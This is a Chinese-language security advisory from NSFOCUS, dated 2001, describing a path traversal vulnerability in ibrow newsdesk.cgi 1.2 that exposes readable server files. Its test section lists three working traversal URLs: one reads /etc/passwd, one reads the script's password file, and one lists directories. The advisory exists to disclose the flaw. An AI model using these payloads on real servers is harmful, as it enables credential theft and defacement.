安全研究

安全漏洞
newsdesk.cgi泄漏文件的漏洞

发布日期:2001-01-06
更新日期:2001-01-06

受影响系统:

ibrow newsdesk.cgi 1.2
描述:

Newsdesk(http://www.ibrow.com)是一个CGI脚本,通过它可对网站的新闻标题
进行远程管理。

由于未能从用户提供的输入中正确地滤除“/../”字符串,恶意的远程用户可以利用
newsdesk.cgi脚本来察看文件系统中的任何文件的内容,并可利用它泄漏运行web服
务器的用户所能读取的那部分文件系统的结构。

这个漏洞会使得攻击者获得密码或其它敏感信息,从而使攻击者可以以web服务器的
权限交互地访问远程系统。如果攻击者能够取得newsdesk.cgi的密码串,就可以涂
改网站内容。

<*来源:B10Z Security (path@ns.sympatico.ca) *>



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


察看/etc/passwd文件:
http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?t=../../../../etc/passwd
察看newsdesk.cgi的密码串:
http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?t=../pass.txt
列目录:
http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?t=../../../../etc/

建议:

临时解决办法:

   NSFOCUS建议您在没有补丁或升级版本前暂停使用newsdesk.cgi。


厂商补丁:

  暂无


浏览次数:4331
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障